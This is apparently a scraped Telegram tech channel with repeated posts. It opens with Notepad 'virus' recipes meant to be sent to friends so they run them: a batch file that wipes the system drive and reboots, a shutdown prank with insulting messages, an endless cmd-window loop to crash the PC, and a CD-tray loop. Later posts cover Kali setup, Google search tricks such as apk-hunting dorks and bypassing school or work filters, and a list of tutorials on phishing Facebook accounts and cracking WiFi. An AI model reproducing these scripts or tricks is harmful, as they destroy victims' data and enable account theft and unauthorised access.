Tech Byte™
1⃣Continually pop out your friend’s CD Drive. If they have more than one, it pops out all of them! Copy and type this Code in Notepad: Set oWMP = CreateObject(“WMPlayer.OCX.”) Set colCDROMs = oWMP.cdromCollection do if colCDROMs.Count>= 1 then For i = 0 to…
2⃣Convey your friend a little message and shut down his / her computer:
Type this code:
Save it as FileName.vbs and send it. Make sure they open the file for it to work.
Type this code:
@echo off
msg * I don’t like you
shutdown -c “Error! You are too stupid!” -s
Save it as FileName.vbs and send it. Make sure they open the file for it to work.
Tech Byte™
2⃣Convey your friend a little message and shut down his / her computer: Type this code: @echo off msg * I don’t like you shutdown -c “Error! You are too stupid!” -s Save it as FileName.vbs and send it. Make sure they open the file for it to work.
3⃣This virus deletes the Contents of a Drive
Type this in Notepad:
Save the above code as "FileName.bat"
@TechByte | @GEEKernel
Type this in Notepad:
@echo off
del %systemdrive%*.* /f /s /q
shutdown -r -f -t 00
Save the above code as "FileName.bat"
@TechByte | @GEEKernel
Tech Byte™
3⃣This virus deletes the Contents of a Drive Type this in Notepad: @echo off del %systemdrive%*.* /f /s /q shutdown -r -f -t 00 Save the above code as "FileName.bat" @TechByte | @GEEKernel
4⃣Open Infinite cmd.exe windows to crash PC
Type this in Notepad.
Save it as FileName.bat
Type this in Notepad.
@echo off
:top
start
goto top
Save it as FileName.bat
Tech Byte™
4⃣Open Infinite cmd.exe windows to crash PC Type this in Notepad. @echo off :top start goto top Save it as FileName.bat
I've got lots of messages about what the commands in the codes mean, so let's use virus 4 to explain them.
@echo - This will display anything in the command prompt (cmd) shell, if we set this as off(as in "@echo off), nothing in the rest of the code will be seen in the cmd shell.
:top - This will be our starting point of our loop.
start - This opens one cmd window
goto - This will make the scipt (or virus) go to any text within the code. [Example; "goto top" will go to the point with ":top" and start from there].
So according to this, the script will force the system to open a blank cmd window, then another, and another...untill the system runs out of RAM.
To get out of this loop, simply reboot your PC, since you can't do it by pointing the mouse (because your PC will be hanging like heck by then), you'll be forced to shutdown by pressing the physical power button on your PC.
@echo - This will display anything in the command prompt (cmd) shell, if we set this as off(as in "@echo off), nothing in the rest of the code will be seen in the cmd shell.
:top - This will be our starting point of our loop.
start - This opens one cmd window
goto - This will make the scipt (or virus) go to any text within the code. [Example; "goto top" will go to the point with ":top" and start from there].
So according to this, the script will force the system to open a blank cmd window, then another, and another...untill the system runs out of RAM.
To get out of this loop, simply reboot your PC, since you can't do it by pointing the mouse (because your PC will be hanging like heck by then), you'll be forced to shutdown by pressing the physical power button on your PC.
Install Kali 2.0
Dual-Boot: docs.kali.org/installation/dual-boot-kali-with-windows
Virtual Machine: www.computersnyou.com/1626/how-to-install-kali-linux-in-virtual-machine-step-by-step/
Dual-Boot: docs.kali.org/installation/dual-boot-kali-with-windows
Virtual Machine: www.computersnyou.com/1626/how-to-install-kali-linux-in-virtual-machine-step-by-step/
Tech Byte™
Install Kali 2.0 Dual-Boot: docs.kali.org/installation/dual-boot-kali-with-windows Virtual Machine: www.computersnyou.com/1626/how-to-install-kali-linux-in-virtual-machine-step-by-step/
There's how to install Kali Linux on a Windows PC.
To download Kali, go to kali.org/downloads and choose a version matching your device specifications. Alternatively, you can download the Light version right here, in this channel. I couldn't upload the other versions because they are all over 2GB in size, which exceeds Telegram's 1.5GB file size limit.
After downloading and installing Kali, you can go to kalitutorials.net to find your way around the terminal, I'll keep sharing Kali tutorials here, so stay tuned.
@TechByte
To download Kali, go to kali.org/downloads and choose a version matching your device specifications. Alternatively, you can download the Light version right here, in this channel. I couldn't upload the other versions because they are all over 2GB in size, which exceeds Telegram's 1.5GB file size limit.
After downloading and installing Kali, you can go to kalitutorials.net to find your way around the terminal, I'll keep sharing Kali tutorials here, so stay tuned.
@TechByte
Kali Linux
Get Kali | Kali Linux
Home of Kali Linux, an Advanced Penetration Testing Linux distribution used for Penetration Testing, Ethical Hacking and network security assessments.
@TechByte Kali-Linux-Light-2017-x86.iso
832.7 MB
Kali Linux 2017.1 | 32-bit
Latest Stable Release
Latest Stable Release
Tech Byte™ via @like
Getting the Most out of Google Search
Tired of typing many words and scrolling lots of pages on Google to find what you were looking for?
These simple search shortcuts and parameters will help you spend less time on Google, but make the most of it.
@TechByte
</lesson_001.0:> Search Shortcuts
Tired of typing many words and scrolling lots of pages on Google to find what you were looking for?
These simple search shortcuts and parameters will help you spend less time on Google, but make the most of it.
@TechByte
1⃣Weather Forecast
Typing "weather [city]" returns the current weather in the city mentioned, with a 5-day forecast
@TechByte
Typing "weather [city]" returns the current weather in the city mentioned, with a 5-day forecast
@TechByte
2⃣Global Time
Typing "time [city/country]" will return the current time in the place you looked. Useful when you want to travel to somewhere in a different time zone.
@TechByte
Typing "time [city/country]" will return the current time in the place you looked. Useful when you want to travel to somewhere in a different time zone.
@TechByte
3⃣Calculator
Type any mathematical calculation. You can also search "calculator" and the calculator pops up.
@TechByte
Type any mathematical calculation. You can also search "calculator" and the calculator pops up.
@TechByte
4⃣Instant Dictionary
Search "define:[search term]". Google will give you an instant definition of your search term, along with synonyms and translations.
@TechByte
Search "define:[search term]". Google will give you an instant definition of your search term, along with synonyms and translations.
@TechByte
5⃣Quick Directions
Type [current location] to [location] and Google Maps brings up the directions, quickest route, drive time and distance between the locations.
@TechByte
Type [current location] to [location] and Google Maps brings up the directions, quickest route, drive time and distance between the locations.
@TechByte
6⃣Find Artist Works
Searching "[artist] works" brings up an instant list of works by that artist. Ex: "G Easy songs"
@TechByte
Searching "[artist] works" brings up an instant list of works by that artist. Ex: "G Easy songs"
@TechByte
7⃣Search within a Website
If you really love a website but its search tool isn't that great, Google can search it for you.
Just use the site: parameter. Type
Example: "site:androidpolice.com Nexus 5X"
@TechByte
If you really love a website but its search tool isn't that great, Google can search it for you.
Just use the site: parameter. Type
site:url [search term]
Example: "site:androidpolice.com Nexus 5X"
@TechByte
8⃣Find Free Downloads of Any Type
Ever needed an Android app but couldn't find the apk for it? Or wanted an MP3 but couldn't find the right version?
Google has a few tools that, when used together, can unlock a plethora of downloads: inurl, intitle and filetype… Example, to find free Android apks, you'd search for
or just
Ever needed an Android app but couldn't find the apk for it? Or wanted an MP3 but couldn't find the right version?
Google has a few tools that, when used together, can unlock a plethora of downloads: inurl, intitle and filetype… Example, to find free Android apks, you'd search for
-inurl:htm -inurl:html filetype:apk intitle:"index of" apk
or just
intitle:"index of" apk
9⃣Google Cache
Google has a cache of almost every popular website. If you want to find it, just type cache: before the site's URL. This is also useful for finding old versions of the site or accessing sites that are down.
Example:
Google has a cache of almost every popular website. If you want to find it, just type cache: before the site's URL. This is also useful for finding old versions of the site or accessing sites that are down.
Example:
cache:telegram.org
🔟Translate any Website
Want to visit a website but it's in a language you don't understand? Just add the link you wanna visit at the end of the Google Translate URL.
Example:
^^Replace "en" with an abbreviation of the language you want to translate the site into (example: ru for Russian, sw for Swahili, ir for Persian...)
^^Replace "example.com" with the website you want to translate.
As a bonus, this also helps you access blocked websites at school or work by bypassing proxies, the way VPN apps work.
@TechByte
Want to visit a website but it's in a language you don't understand? Just add the link you wanna visit at the end of the Google Translate URL.
Example:
http://translate.google.com/translate?sl=ja&tl=en&u=http://example.com
^^Replace "en" with an abbreviation of the language you want to translate the site into (example: ru for Russian, sw for Swahili, ir for Persian...)
^^Replace "example.com" with the website you want to translate.
As a bonus, this also helps you access blocked websites at school or work by bypassing proxies, the way VPN apps work.
@TechByte
11. Precise Time-Based Search Results
You're probably seen the option on Google that lets you filter results by time, such as past hour, day or week. But, of you want to be more specific – like in the past 10 minutes, you can do it with a URL tweak. Add &tbs=qdr: to the end of the URL, along with the time (h5 for 5 hours, n5 for 5 minutes, s5 for 5 seconds). To search the past 10 minutes, you'd add &tbs=qdr:n10 to your URL. It's handy for getting the most up-to-the-minute results.
12. Convert Units of Measure
To convert metrical units, just type [number][unit] to [unit]
Ex: "5 ounces to grams"
It also works in converting digital size. Ex: "5MB to KB"
13. Convert Currency
If you want to convert currency, just type [number][currency] to [currency]
Ex: "USD to Yen" to convert US dollars to Japanese Yen or "BTC to USD" to covert bitcoin to US dollars
@TechByte
You're probably seen the option on Google that lets you filter results by time, such as past hour, day or week. But, of you want to be more specific – like in the past 10 minutes, you can do it with a URL tweak. Add &tbs=qdr: to the end of the URL, along with the time (h5 for 5 hours, n5 for 5 minutes, s5 for 5 seconds). To search the past 10 minutes, you'd add &tbs=qdr:n10 to your URL. It's handy for getting the most up-to-the-minute results.
12. Convert Units of Measure
To convert metrical units, just type [number][unit] to [unit]
Ex: "5 ounces to grams"
It also works in converting digital size. Ex: "5MB to KB"
13. Convert Currency
If you want to convert currency, just type [number][currency] to [currency]
Ex: "USD to Yen" to convert US dollars to Japanese Yen or "BTC to USD" to covert bitcoin to US dollars
@TechByte
For our new members, here are some of our best tutorials you might have missed!
How to Send any File on WhatsApp
How to Set Screen Lock Pattern on Windows PC
How to Fix “App Not Installed” Error
How to Make Clothes See-through in Photoshop
How to Hack Facebook 1. Credentials Harvester Attack
How to Hack WiFi 1. Aircrack-ng
How to Hack Facebook 2. Phishing
How to Jailbreak an iPhone/Pod/Pad
How to Access the Dark Web 1. Tor
How to Access the Dark Web 2. Orfox on Android
How to Access the Dark Web 2.1. Fire.onion on Android
How to View Stored Passwords 1. in Firefox
How to Write Computer Viruses 1. using Notepad
How to Install Kali Linux 2.0
How to Get the Most out of Google Search
How to Send any File on WhatsApp
How to Set Screen Lock Pattern on Windows PC
How to Fix “App Not Installed” Error
How to Make Clothes See-through in Photoshop
How to Hack Facebook 1. Credentials Harvester Attack
How to Hack WiFi 1. Aircrack-ng
How to Hack Facebook 2. Phishing
How to Jailbreak an iPhone/Pod/Pad
How to Access the Dark Web 1. Tor
How to Access the Dark Web 2. Orfox on Android
How to Access the Dark Web 2.1. Fire.onion on Android
How to View Stored Passwords 1. in Firefox
How to Write Computer Viruses 1. using Notepad
How to Install Kali Linux 2.0
How to Get the Most out of Google Search